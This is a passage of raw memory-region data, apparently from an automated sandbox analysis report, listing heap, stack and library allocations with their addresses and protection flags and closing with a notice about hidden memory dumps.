page read and write
7FF7C0F80000
trusted library allocation
page read and write
1C18D000
heap
page read and write
7FF7C0D70000
trusted library allocation
page execute and read and write
7FF7C10CC000
trusted library allocation
page read and write
21EEB825000
heap
page read and write
7FF7C0F00000
trusted library allocation
page read and write
22367FE3000
heap
page read and write
1B480001000
trusted library allocation
page read and write
55E333F000
stack
page read and write
7FF7C10A0000
trusted library allocation
page read and write
565B3FE000
stack
page read and write
22367D83000
heap
page read and write
1B490031000
trusted library allocation
page read and write
7FF7C0FC0000
trusted library allocation
page read and write
7FF7C0FE0000
trusted library allocation
page read and write
22351022000
trusted library allocation
page read and write
1B481031000
trusted library allocation
page read and write
191B8EAE000
trusted library allocation
page read and write
191B8EDF000
trusted library allocation
page read and write
191CFD03000
heap
page read and write
191B8597000
trusted library allocation
page read and write
191B8DF8000
trusted library allocation
page read and write
13111000
trusted library allocation
page read and write
1562000
heap
page read and write
2E5F47F000
stack
page read and write
22367D8F000
heap
page read and write
21ED1558000
heap
page read and write
2235FCDC000
trusted library allocation
page read and write
1B4F20C7000
heap
page read and write
7FF7C0EB0000
trusted library allocation
page read and write
FD0000
heap
page read and write
1514000
heap
page read and write
21ED3339000
trusted library allocation
page read and write
223516A1000
trusted library allocation
page read and write
1B4F3CA8000
heap
page read and write
34E727F000
stack
page read and write
7FF7C0EC0000
trusted library allocation
page read and write
1B4F2030000
trusted library allocation
page read and write
191CFB98000
heap
page read and write
7FF7C0CC0000
trusted library allocation
page read and write
223678AB000
heap
page read and write
22367E80000
heap
page execute and read and write
7FF7C0F80000
trusted library allocation
page read and write
7FF7C0F70000
trusted library allocation
page read and write
1BE9E000
stack
page read and write
1BAF0000
heap
page read and write
22368172000
heap
page read and write
191CF596000
heap
page read and write
21ED16A0000
heap
page execute and read and write
7FF7C0EC0000
trusted library allocation
page read and write
1B4F2053000
heap
page read and write
21EE3185000
trusted library allocation
page read and write
191CFCA0000
heap
page read and write
565B97D000
stack
page read and write
14CA000
heap
page read and write
1B480F9F000
trusted library allocation
page read and write
1B4F1F80000
heap
page read and write
7FF7C0EF0000
trusted library allocation
page read and write
191C7889000
trusted library allocation
page read and write
22350BAA000
trusted library allocation
page read and write
565B7FA000
stack
page read and write
1B4F1F90000
heap
page read and write
7FF7C0E70000
trusted library allocation
page execute and read and write
2E5F57E000
stack
page read and write
191B87A2000
trusted library allocation
page read and write
2234F730000
heap
page readonly
1450000
heap
page read and write
21ED1775000
heap
page read and write
7FF7C0DD0000
trusted library allocation
page execute and read and write
191B7420000
heap
page read and write
21EEB84D000
heap
page read and write
2236801C000
heap
page read and write
2E600CE000
stack
page read and write
191B5D85000
heap
page read and write
7FF7C0F10000
trusted library allocation
page read and write
1483000
trusted library allocation
page read and write
7FF7C0CB0000
trusted library allocation
page read and write
1CF88000
stack
page read and write
34E6E7E000
stack
page read and write
1815000
heap
page read and write
7FF7C0D96000
trusted library allocation
page execute and read and write
21ED3197000
trusted library allocation
page read and write
7FF7C10E0000
trusted library allocation
page read and write
22350C67000
trusted library allocation
page read and write
191CFA31000
heap
page read and write
191CF9E0000
heap
page read and write
1B4F43F3000
heap
page read and write
55E30B6000
stack
page read and write
7FF7C0FD0000
trusted library allocation
page read and write
1B4F4220000
heap
page read and write
7FF7C0EF0000
trusted library allocation
page read and write
191CFB70000
heap
page read and write
7FF7C0E8A000
trusted library allocation
page read and write
1B4F3BC0000
heap
page execute and read and write
191CFE33000
heap
page read and write
22350903000
trusted library allocation
page read and write
2E5F2F6000
stack
page read and write
7FF7C0CB2000
trusted library allocation
page read and write
22368129000
heap
page read and write
7FF7C1050000
trusted library allocation
page read and write
21EEB7FF000
heap
page read and write
34E6C7E000
stack
page read and write
7FF7C1100000
trusted library allocation
page read and write
2236810D000
heap
page read and write
13F0000
heap
page read and write
1B4F4453000
heap
page read and write
1B49030F000
trusted library allocation
page read and write
7FF7C0CB3000
trusted library allocation
page execute and read and write
1CB8E000
stack
page read and write
7FF7C0CD0000
trusted library allocation
page read and write
7FF7C0FA0000
trusted library allocation
page read and write
7FF7C0E94000
trusted library allocation
page read and write
565B67E000
stack
page read and write
1B4F419B000
heap
page read and write
7FF7C0F60000
trusted library allocation
page read and write
34E6FF9000
stack
page read and write
1B4F2310000
heap
page read and write
21ED3D07000
trusted library allocation
page read and write
7FF7C0CB3000
trusted library allocation
page execute and read and write
21ED2F50000
trusted library allocation
page read and write
21ED1531000
heap
page read and write
565B9F9000
stack
page read and write
1B480BEA000
trusted library allocation
page read and write
1B4F209D000
heap
page read and write
7FF7C1012000
trusted library allocation
page read and write
21EE3404000
trusted library allocation
page read and write
21EE341C000
trusted library allocation
page read and write
22350687000
trusted library allocation
page read and write
34E71FE000
stack
page read and write
7FF7C1010000
trusted library allocation
page read and write
21ED1630000
heap
page read and write
191B85C3000
trusted library allocation
page read and write
565B373000
stack
page read and write
7FF7C0CCD000
trusted library allocation
page execute and read and write
2234F6D0000
heap
page read and write
3159000
trusted library allocation
page read and write
7FF7C10D6000
trusted library allocation
page read and write
13108000
trusted library allocation
page read and write
2234DCC8000
heap
page read and write
7FF7C1000000
trusted library allocation
page read and write
191B7580000
heap
page read and write
2E5F07A000
stack
page read and write
1B4F3C10000
trusted library allocation
page read and write
7FF7C0D6C000
trusted library allocation
page execute and read and write
7FF7C1004000
trusted library allocation
page read and write
7FF7C1038000
trusted library allocation
page read and write
22368176000
heap
page read and write
14E3000
heap
page read and write
7FF7C0E52000
trusted library allocation
page read and write
1B4F44FB000
heap
page read and write
21ED1650000
trusted library section
page read and write
21ED43B9000
trusted library allocation
page read and write
21EEB7EF000
heap
page read and write
7FF7C0FB0000
trusted library allocation
page read and write
565BBB8000
stack
page read and write
3161000
trusted library allocation
page read and write
1B68D000
stack
page read and write
7FF7C0F20000
trusted library allocation
page read and write
7FF7C0DD0000
trusted library allocation
page execute and read and write
191B5D80000
heap
page read and write
7FF7C0F20000
trusted library allocation
page read and write
21ED4233000
trusted library allocation
page read and write
7FF7C1130000
trusted library allocation
page read and write
1B4818F1000
trusted library allocation
page read and write
22350A7B000
trusted library allocation
page read and write
2234F750000
heap
page read and write
7FF7C10B0000
trusted library allocation
page read and write
1480000
trusted library allocation
page read and write
7FF7C0F00000
trusted library allocation
page read and write
21ED15BA000
heap
page read and write
7DF4936B0000
trusted library allocation
page execute and read and write
2234DF25000
heap
page read and write
7FF7C1040000
trusted library allocation
page read and write
191CFE1F000
heap
page read and write
191B5AF5000
heap
page read and write
1B4804CD000
trusted library allocation
page read and write
21ED42E9000
trusted library allocation
page read and write
223516C1000
trusted library allocation
page read and write
191B8769000
trusted library allocation
page read and write
191B5AB0000
heap
page read and write
7FF7C0EB0000
trusted library allocation
page execute and read and write
1B4F44B4000
heap
page read and write
7FF7C0FF0000
trusted library allocation
page read and write
7FF7C0FF0000
trusted library allocation
page read and write
1B4F2135000
heap
page read and write
21EEB7CE000
heap
page read and write
7FF7C0E80000
trusted library allocation
page execute and read and write
21ED1770000
heap
page read and write
2234F895000
heap
page read and write
7FF7C0F30000
trusted library allocation
page read and write
7FF7C0CC0000
trusted library allocation
page read and write
191B8651000
trusted library allocation
page read and write
55E3F07000
stack
page read and write
223681D0000
trusted library allocation
page read and write
565C80E000
stack
page read and write
17C0000
heap
page execute and read and write
2235FB9B000
trusted library allocation
page read and write
1B481E26000
trusted library allocation
page read and write
22367D93000
heap
page read and write
565BE3B000
stack
page read and write
7FF7C0D96000
trusted library allocation
page execute and read and write
7FF7C0CBD000
trusted library allocation
page execute and read and write
21ED30D0000
heap
page execute and read and write
7FF7C0FD0000
trusted library allocation
page read and write
7FF7C0F90000
trusted library allocation
page read and write
191B5AF9000
heap
page read and write
1B481120000
trusted library allocation
page read and write
1B4F2089000
heap
page read and write
1B480FA1000
trusted library allocation
page read and write
7FF7C0CDB000
trusted library allocation
page execute and read and write
191B93B1000
trusted library allocation
page read and write
7FF7C1106000
trusted library allocation
page read and write
1B4F4390000
heap
page read and write
7FF7C0CCD000
trusted library allocation
page execute and read and write
7FF7C0CEB000
trusted library allocation
page read and write
1B4811D8000
trusted library allocation
page read and write
2E5F3F8000
stack
page read and write
1D18E000
stack
page read and write
1B480229000
trusted library allocation
page read and write
34E6CFE000
stack
page read and write
7FF7C0F90000
trusted library allocation
page read and write
7FF7C0D96000
trusted library allocation
page execute and read and write
1CE8A000
stack
page read and write
2234DD1D000
heap
page read and write
2234DD03000
heap
page read and write
2234DD01000
heap
page read and write
1B481868000
trusted library allocation
page read and write
7FF7C0F40000
trusted library allocation
page read and write
21ED499F000
trusted library allocation
page read and write
21ED14D7000
heap
page read and write
13101000
trusted library allocation
page read and write
34E7D4E000
stack
page read and write
1B4F43E2000
heap
page read and write
1BF9E000
stack
page read and write
7FF7C10D0000
trusted library allocation
page read and write
7FF7C0F50000
trusted library allocation
page read and write
22350BDE000
trusted library allocation
page read and write
2236816E000
heap
page read and write
1B481950000
trusted library allocation
page read and write
7FF7C1106000
trusted library allocation
page read and write
1B48188E000
trusted library allocation
page read and write
2235FC82000
trusted library allocation
page read and write
21ED14D0000
heap
page read and write
2E5EEFE000
stack
page read and write
1CBAA000
heap
page read and write
191B9391000
trusted library allocation
page read and write
22368131000
heap
page read and write
565BD3E000
stack
page read and write
1B4F3E40000
heap
page execute and read and write
2234F720000
trusted library allocation
page read and write
1B4F44E7000
heap
page read and write
7FF7C1100000
trusted library allocation
page read and write
21EEB7F7000
heap
page read and write
7FF7C0CF0000
trusted library allocation
page read and write
2234DED0000
heap
page read and write
7FF7C0CDD000
trusted library allocation
page execute and read and write
191B74C6000
heap
page execute and read and write
21EEB7BE000
heap
page read and write
22367DC6000
heap
page read and write
191B5AF7000
heap
page read and write
21EEB532000
heap
page read and write
1B4F2270000
trusted library allocation
page read and write
7FF7C0CE0000
trusted library allocation
page read and write
7FF7C0DD5000
trusted library allocation
page execute and read and write
2E5EBDE000
stack
page read and write
7FF7C1030000
trusted library allocation
page read and write
155C000
heap
page read and write
7DF4936C0000
trusted library allocation
page execute and read and write
2E6024D000
stack
page read and write
7FF7C1120000
trusted library allocation
page read and write
7FF7C1010000
trusted library allocation
page read and write
21EEB75E000
heap
page read and write
7FF7C0DE0000
trusted library allocation
page execute and read and write
7FF7C10A3000
trusted library allocation
page read and write
21EEB874000
heap
page read and write
7FF7C0D86000
trusted library allocation
page read and write
2234DCC0000
heap
page read and write
1B4F450E000
heap
page read and write
21EE3141000
trusted library allocation
page read and write
2E6004C000
stack
page read and write
34E7FCE000
stack
page read and write
1B4F43B3000
heap
page read and write
191B7585000
heap
page read and write
21EEB630000
heap
page read and write
7FF7C0ED0000
trusted library allocation
page read and write
21EEB8A3000
heap
page read and write
7FF7C1030000
trusted library allocation
page read and write
2236806F000
heap
page read and write
7FF7C0CCB000
trusted library allocation
page read and write
7FF7C1140000
trusted library allocation
page read and write
7FF7C0D6C000
trusted library allocation
page execute and read and write
7FF7C10AC000
trusted library allocation
page read and write
21ED1690000
trusted library allocation
page read and write
7FF7C0FD0000
trusted library allocation
page read and write
21ED435E000
trusted library allocation
page read and write
191B73A0000
trusted library section
page read and write
21ED16B0000
heap
page readonly
22368153000
heap
page read and write
1B481E21000
trusted library allocation
page read and write
7FF7C0EE0000
trusted library allocation
page read and write
223511EF000
trusted library allocation
page read and write
565BA3E000
stack
page read and write
1B490077000
trusted library allocation
page read and write
21EE33FE000
trusted library allocation
page read and write
191CFE24000
heap
page read and write
2234F740000
trusted library allocation
page read and write
7FF7C10E0000
trusted library allocation
page execute and read and write
22367D0C000
heap
page read and write
7FF7C10BC000
trusted library allocation
page read and write
14E1000
heap
page read and write
7FF7C1040000
trusted library allocation
page read and write
191B8C2D000
trusted library allocation
page read and write
191CFA65000
heap
page read and write
7FF7C0EE0000
trusted library allocation
page read and write
7FF7C1040000
trusted library allocation
page read and write
1B4F2220000
trusted library allocation
page read and write
34E6EF7000
stack
page read and write
1CBB6000
heap
page read and write
1B4F4509000
heap
page read and write
21ED2F20000
trusted library allocation
page read and write
1B4F2315000
heap
page read and write
There are 874 hidden memdumps, click here to show them.